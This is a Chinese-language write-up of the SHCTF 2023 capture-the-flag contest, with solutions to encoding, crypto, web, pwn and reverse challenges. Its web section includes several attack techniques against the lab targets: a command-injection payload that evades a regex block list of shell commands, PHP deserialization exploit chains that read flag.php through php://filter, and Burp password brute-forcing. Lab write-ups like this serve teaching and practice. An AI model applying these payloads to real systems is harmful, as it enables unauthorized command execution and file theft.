SHCTF(山河)赛事部分Write up-白猫

举报
白猫a 发表于 2023/11/03 14:47:09 2023/11/03
【摘要】 SHCTF(山河)赛事部分Write up-白猫 MISC [WEEK1]签到题下载题目并打开:base128编码:Wm14aFozdDBhR2x6WDJselgyWnNZV2Q5因为是base128编码,所以通过两次base64解码,即可得出flag爆出flag:flag{this_is_flag}**总结: **这道签到题主要考察了对base64编码的基础了解 [WEEK1]Stega...

SHCTF(山河)赛事部分Write up-白猫

MISC

[WEEK1]签到题

下载题目并打开:
image.png
base128编码:
Wm14aFozdDBhR2x6WDJselgyWnNZV2Q5
因为是base128编码,所以通过两次base64解码,即可得出flag
image.png
爆出flag:
flag{this_is_flag}
**总结: **

这道签到题主要考察了对base64编码的基础了解

[WEEK1]Steganography

下载题目并打开:image.png有三个文件,两个图片文件和一个压缩包文件
看到了flag压缩包,打开看一下image.png发现有flag文本文件存在,但是需要密码
那么密码信息可能在上面那两个图片文件中,直接放入到010浅浅分析一波
image.png
两个图片竟然一模一样,有点意思
在careful.jpg图片16进制字符串中发现了base64编码格式(==或=就是base64编码的重要特征)
image.png
MTJlcmNzLi4uLi45MDlqaw==
放到Kali里面浅浅解码一波
image.png
得到如下字符串
12ercs.....909jk
想到flag.txt需要用密码打开,猜测这个就是密码,但是呢,还有一个图片没有用上,所以这5个点显然不是密码。
把careful1.jpg放入到010分析一波image.png
在16进制字符串中并没有发现什么有用的东西,只是一堆乱码,那么下一步该如何进行呢?
尝试查看一下careful1.jpg的图片属性,看看是否能有所突破
查看图片属性
image.png
出题人还是非常善良的,可以看到出题人在图片备注中给我们留了信息,刚好是5个字符对应了5个点

xqwed
12ercs.....909jk

密码:
12ercsxqwed909jk
打开flag.txt
image.png
爆出flag:
**flag{4d72e4f3-4d4f-4969-bc8c-a2f6f7a4292c}**

[WEEK1]可爱的派蒙捏

下载题目文件,是一个压缩包,里面只有一张图片
image.png
放到010里面分析一波
image.png
图片隐写,发现存在两个文件txt1.txt和txt2.txt
放到Kali binwalk把这两个文本文件提取出来
image.png
提取成功,看看这两个文件里面是什么内容
image.pngimage.png
刚开始我以为这是什么编码,看来是我想复杂了,经过这两个文件频繁切换,看到了有个别字符不同,大部分字符是相同的,想到了将不同字符提取出来,就是flag
拖入到物理机
image.png
复制到pycharm项目中
image.png
编写python脚本

# 打开第一个文本文件并读取内容
with open('txt1.txt', 'r', encoding='utf-8') as file1:
    text1 = file1.read()
# 打开第二个文本文件并读取内容
with open('txt2.txt', 'r', encoding='utf-8') as file2:
    text2 = file2.read()
# 找出text2中与text1不同的字符
differences = []
for i, (char1, char2) in enumerate(zip(text1, text2)):
    if char1 != char2:
        differences.append(char2)
# 打印text2中与text1不同的字符
print("text2中与text1不同的字符:", ''.join(differences))

在代码中我做了注释,方便大家理解
运行python脚本
image.png
爆出flag:
**flag{4ebf327905288fca947a}**

[WEEK1]message

下载题目并打开:
image.png

0001000D91683106019196F40008C26211002072B975915730671B54114F60000A000A592982B15C065265843D8A938A00000A000A5E8A9AA453D883525730000A000A91527CBE518D6E1751656CEA75D5000A000A6C899ED852305BF94E0D8D77000A000A8FD94E0053CC624B535191195230002062B14F4F4F6000530048004300540046007B00620061003900370038003400300035002D0062003100630038002D0038003400370063002D0038006500360039002D006600360032003100370037006500340063003000380037007D

有ABCDEF猜测是16进制编码,16进制转字符串一把梭
image.png
得出flag:
SHCTF{ba978405-b1c8-847c-8e69-f62177e4c087}

[WEEK1] 真的签到

image.png
不再多说,跟着操作走即可
得出flag:
flag{Welc0me_tO_SHCTF2023}

[WEEK2]远在天边近在眼前

下载题目并打开:
image.png
很明显flag就是所有文件的路径地址
考虑到路径地址复制下来有的符号会丢失,放入010打开
image.png
}/8/2/1/5/a/3/8/4/8/2/5/0/_/?/T/H/G/l/r/I/4/_/Y/s/A/3/_/y/l/L/A/e/r/_/s/i/_/S/i/H/t/{/g/a/l/f
反的flag,还这么长,不想手动排序了,写个python脚本梭一把
image.png

ctf='}/8/2/1/5/a/3/8/4/8/2/5/0/_/?/T/H/G/l/r/I/4/_/Y/s/A/3/_/y/l/L/A/e/r/_/s/i/_/S/i/H/t/{/g/a/l/f'
flag=ctf[::-1]
flag=flag.replace('/','')#删除字符'/'
print(flag)

得出flag:
flag{tHiS_is_reALly_3AsY_4IrlGHT?_0528483a5128}

[FINAL]问卷

image.png
跟着操作走即可
4a0c01102689499eea8e80442d2510d.png
得出flag:
flag{SHCTF_Round2_will_do_even_better!}

Web

[WEEK1]babyRCE

刚开始不要把题想的那么难,看下环境代码

<?php
$rce = $_GET['rce'];
if (isset($rce)) {
	if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
		system($rce);
		}	
else {
		echo "hhhhhhacker!!!"."\n";
		}
} else {
	highlight_file(__FILE__);
}

一、PHP代码审计

  1. 可以明显看到给了一个GET方式传参,这个参数是rce
  2. if判断语句**,isset函数**用来判断rce这个参数是否存在并且是否不为空,如果条件达成,则true
  3. preg_match正则表达式,用来过滤一些命令,可以看到过滤了cat、more、less、head、tac、tail、nl、od、vi、vim、sort、flag等命令并且过滤了整数和空格以及一些常用符号
  4. system外部执行命令,将参数rce的值作为命令执行,从这里可以看出这道题降低了难度,因为我们不再需要外部执行命令了,所以直接给参数rce传值即可
  5. else与if语句联用,反之则输出对应的字符串
  6. 同5,highlight_file(FILE)函数用来高亮显示文件内容,就是把文件内容或者代码高亮显示到网页当中

二、解题思路

  1. 查看目录文件,幸运的是发现ls和/没有被过滤
  2. 绕正则,看它有没有漏掉的过滤命令,发现没有过滤uniq命令,uniq命令可以查看文件内容
  3. 绕正则,查看文件命令需要用到空格,结果发现空格被过滤,可以使用${IFS}代替空格
  4. 绕正则,flag被过滤,可以通过f???进行绕过,可以理解为列出包含f的四个字符文件

三、开始解题

  1. 使用ls命令查看目录文件

?rce=ls
回显结果
image.png
flag.php index.php

  1. 发现有flag.php文件的存在,尝试使用构造payload

?rce=uniq${IFS}f???.php
回显结果
空白内容,F12试试
image.png

<?php
$flag = getenv('GZCTF_FLAG');
if($flag=="not_flag" or $flag==""){
$flag="dzctf{test_flag}";
}

getenv函数用来获取环境变量,flag的值等于这个环境变量的值
如果说flag是空的,则flag是dzctf{test_flag},显然这是不可能的
就是说这个目录下没有flag
那咱们去根目录下试试?

  1. 继续构造payload

?rce=uniq${IFS}/f???.php
发现网页内容为空,F12内容也是空
除了根目录下还有那里有?,猜测flag不是PHP文件,而是文本文件

  1. 继续构造payload

?rce=uniq${IFS}/f???
回显flag
image.png
得出flag:
flag{e85932a6-12df-4991-981c-adaf56337196}

[WEEK1]ez_serialize

题目环境:
image.png

<?php
  highlight_file(__FILE__);

class A{
  public $var_1;

  public function __invoke(){
    include($this->var_1);
  }
}

class B{
  public $q;
  public function __wakeup()
  {
    if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->q)) {
      echo "hacker";           
    }
  }

}
class C{
  public $var;
  public $z;
  public function __toString(){
    return $this->z->var;
  }
}

class D{
  public $p;
  public function __get($key){
    $function = $this->p;
    return $function();
  }  
}

if(isset($_GET['payload']))
{
  unserialize($_GET['payload']);
}
  ?>

exp:

<?php
  class A{
  public $var_1='php://filter/read=convert.base64-encode/resource=flag.php';
  }
  class B{
    public $q;
  }
class C{
  public $var;
  public $z;
}
class D{
  public $p;
}
$A=new A();
$B=new B();
$C=new C();
$D=new D();
$D->p=$A;
$C->var=$B;
$B->q=$C;
$C->z=$D;
echo serialize($C);

运行结果:
O:1:"C":2:{s:3:"var";O:1:"B":1:{s:1:"q";r:1;}s:1:"z";O:1:"D":1:{s:1:"p";O:1:"A":1:{s:5:"var_1";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}}
上传exp:
image.png
PD9waHANCiRmbGFnID0gImZsYWd7NDQxZTY5NzEtMjU3NC00ZWYzLTg5YWYtYWQwNDYwMzA2NmUwfSI7DQo=
base64解码:
image.png
得出flag:
flag{441e6971-2574-4ef3-89af-ad04603066e0}

[WEEK1]登录就给flag

题目环境:
image.png
burpsuite抓包
image.png

初始账号:admin
初始密码:1

HTTP history
image.png
Send to Intruder
image.png
Clear
选中密码1,Add
image.png
Payloads
image.png
Load添加字典
image.png
打开字典
image.png
Start attack开始爆破
e090c218fbdc79eaada97ffb64be64d.png
得到密码
password

账户:admin
密码:password

登录:
image.png
login登录:
image.png
得到flag:
flag{d2974de6-f71e-48f9-9659-dc453a23009a}

[WEEK1]飞机大战

题目环境:
image.png
玩了一把,通过才给flag,所以说想玩通过是不可能的,只能另辟蹊径
F12查看网页源代码
image.png

HTML三大件
HTML+CSS+JavaScript
CSS静态网页样式
JavaScript动态功能

所以说更改游戏分数必须看这个JS文件
image.png
没有看到可控游戏参数,倒是看到了一串\u开头的类似编码的东西
有密码学基础的可以看出这是Unicode编码格式
\u005a\u006d\u0078\u0068\u005a\u0033\u0074\u0068\u0059\u0057\u0051\u0033\u005a\u0044\u0041\u0030\u005a\u0043\u0030\u0030\u004e\u0047\u0049\u0030\u004c\u0054\u0051\u0032\u004f\u0054\u0059\u0074\u0059\u006a\u004e\u006c\u004e\u0053\u0030\u007a\u004d\u007a\u0052\u006b\u004e\u006a\u0064\u0068\u004e\u007a\u004d\u0033\u004e\u0047\u004e\u0039\u000a
Unicode解码一把梭
image.png
base64
ZmxhZ3thYWQ3ZDA0ZC00NGI0LTQ2OTYtYjNlNS0zMzRkNjdhNzM3NGN9
base64解码一把梭
image.png
得到flag:
flag{aad7d04d-44b4-4696-b3e5-334d67a7374c}

[WEEK2]no_wake_up

题目环境:
image.png

<?php
highlight_file(__FILE__);
class flag{
public $username;
public $code;
public function __wakeup(){
$this->username = "guest";
}
public function __destruct(){
if($this->username = "admin"){
include($this->code);
}
}
}
unserialize($_GET['try']);

exp:

<?php
  class flag
{
  public $username = "admin";
public $code = "php://filter/read=convert.base64-encode/resource=flag.php";
}
$l=new flag();
echo serialize($l);

运行结果:
O:4:"flag":2:{s:8:"username";s:5:"admin";s:4:"code";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
上传payload
image.png
base64编码
PD9waHANCiRmbGFnID0gImZsYWd7MTE5NmY2NzQtZjkwMi00YWEzLWI5M2MtNTUyYTgxNTUzMjlkfSI7
base64解码
image.png
得出flag:
flag{1196f674-f902-4aa3-b93c-552a8155329d}

Crypto

[WEEK1]立正

下载题目并打开
image.png
wl hgrfhg 4gNUx4NgQgEUb4NC64NHxZLg636V6CDBiDNUHw8HkapH :jdoi vl vlkw ~xrb wd nrrT Y:
一把梭:
c7efdde8434f3ca711ce7d929b939cb.png
得到flag:
flag{Y0U_MU57_5t4nd_uP_r1gHt_n0W}

[WEEK1]Crypto_Checkin

下载题目并打开
image.png
QZZ|KQbjRRS8QZRQdCYwR4_DoQ7~jyO>0t4R4__aQZQ9|Rz+k_Q!r#mR90+NR4_4NR%>ipO>0s{R90|SQhHKhRz+k^S8Q5JS5|OUQZO}CQfp*dS8P&9R8>k?QZYthRz+k_O>0#>
base85(b)解码:
R1kzRE1RWldHRTNET04yQ0dVMkRNT0JUR0UzVEdOS0dHTVlUT01aVklZMkRFTVpVRzRaVEdNWlZJWVpUR05TRkdZWlRHTUJXR1FaVEdOMkU=
Base16-32-64-91混合多重解码:
base64
R1kzRE1RWldHRTNET04yQ0dVMkRNT0JUR0UzVEdOS0dHTVlUT01aVklZMkRFTVpVRzRaVEdNWlZJWVpUR05TRkdZWlRHTUJXR1FaVEdOMkU=
base32
GY3DMQZWGE3DON2CGU2DMOBTGE3TGNKGGMYTOMZVIY2DEMZUG4ZTGMZVIYZTGNSFGYZTGMBWGQZTGN2E
base16
666C61677B546831735F31735F423473335F336E633064337D
三种base混合解码
得出flag:
flag{Th1s_1s_B4s3_3nc0d3}

[WEEK1]残缺的md5

下载题目并打开:
image.png
使用python写脚本:

import itertools
import string
import hashlib
def generate_strings():
    characters = "QWERTYUIOPLKJHGFDSAZXCVBNM012345689"
    for _ in itertools.product(characters, repeat=1):
        yield ''.join(_)
# 输入的固定部分
a = 'KCLWG'
b = 'K8M9O3'
c = 'DE'
e = '84S9'
# 计算目标MD5哈希值
target_md5_suffix = "b2ac4e6"
for part1 in generate_strings():
    for part2 in generate_strings():
        for part3 in generate_strings():
            str_to_hash = a + part1 + b + part2 + c + part3 + e
            # 计算new_string的MD5哈希值
            md5_hash = hashlib.md5(str_to_hash.encode()).hexdigest()
            # 检查MD5哈希值的后七位是否与目标匹配
            if md5_hash[-7:] == target_md5_suffix:
                print("MD5加密前为:", str_to_hash)
                print("MD5加密后为:", md5_hash)

运行结果:
image.png
写个python脚本转大写

flag='f0af1443b1f463eafff7aebb8b2ac4e6'
print(flag.upper())

运行结果:
image.png
得到flag:
flag{F0AF1443B1F463EAFFF7AEBB8B2AC4E6}

[WEEK1]凯撒大帝

下载题目并打开:
image.png
凯撒移位
image.png
得到flag:
flag{chutihaonan}

[WEEK1]进制

下载题目并打开:
image.png
16进制转字符串
image.png
哈希还原
image.png
得到flag:
flag{ahfkjlhkah}

[WEEK1]okk

下载题目并打开:
image.png
Ook编码转文本
image.png
image.png
得到flag:
flag{123456789}

[WEEK1]熊斐特

下载题目并打开:
image.png
Atbash Cipher(埃特巴什码)转化
image.png
得到flag:
flag{atbash cipher}

[WEEK1]黑暗之歌

下载题目并打开:
image.png
盲文解密
image.png
base64解密
image.png
音符解密
image.png
得出flag:
flag{b2cc-9091-8a29}

[WEEK1]迷雾重重

下载题目并打开:
image.png
二进制转摩斯密码
0为’.‘1为’-‘空格为’/'
..-./.-../.-/--./----.--/--/---/.-./..././..--.-/../.../..--.-/...-/./.-./-.--/..--.-/..-./..-/-./-----.-
摩斯密码解密
image.png

%u7b={
%u7d=}

得到flag:
FLAG{MORSE_IS_VERY_FUN}

[WEEK1]难言的遗憾

下载题目并打开:image.png
中文电码解密
image.png
得出flag:
flag{一天不学高数我就魂身难受}

[WEEK1]小兔子可爱捏

下载题目并打开:
image.png
image.png
宇宙的终极答案是:42
Rabbit(兔子)解密
image.png
得到flag:
flag{i_love_technology}

[WEEK1]what is m

下载题目并打开:
image.png
还原m即可
写个python脚本一把梭

from Crypto.Util.number import long_to_bytes
m = 7130439814059477365465881592242189984174813803592711881640295679655301582414518361829827793806793804626699859619466410111590180160366476408654141662794502447303629472823901463632274384106877
flag=long_to_bytes(m)
print(flag)
#将m转为字节

运行结果:
image.png
得出flag:
flag{th3re_4r3_S3veral_aITErnA7lvES_70_tHE_L0N6_7O_8Y73S_1UNcTION_dg12dC49bTf5}

PWN

[WEEK1]nc

nc连接
image.png
ls
cat flag
一把梭
image.png
得到flag:
flag{1dcc22cb-ae4d-4cb0-88f2-2e1461b1bb5c}

[WEEK1]hard nc

nc连接
image.png

ls
cat flag
ls gift2
cat gift2
cd gift2
ls
cat flag2

image.png
base64编码
OTMtYTg3ZC0zN2FjMDljMGU1Njl9Cg==
base64解码
93-a87d-37ac09c0e569}
好家伙只给了一半flag,再找找上半部分

ls -a查看隐藏目录文件
cat .gift

image.png
flag前半部分
flag{a284241c-5d85-46
前后合并
得出flag:
flag{a284241c-5d85-4693-a87d-37ac09c0e569}

Reverse

[WEEK1]signin

下载题目并打开:
image.png
可执行文件
放入IDA进行分析
image.png
得到flag:
flag{flag1sinarray}


后期我会去看看其他大佬师傅的WP,自己不会的看看能不能复现,太菜了,呜呜呜,争取给CTF新人做更好的题解;WP中有不足的地方还望师傅们积极提出。

原文地址:https://blog.csdn.net/m0_73734159/article/details/134111972?spm=1001.2014.3001.5502

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。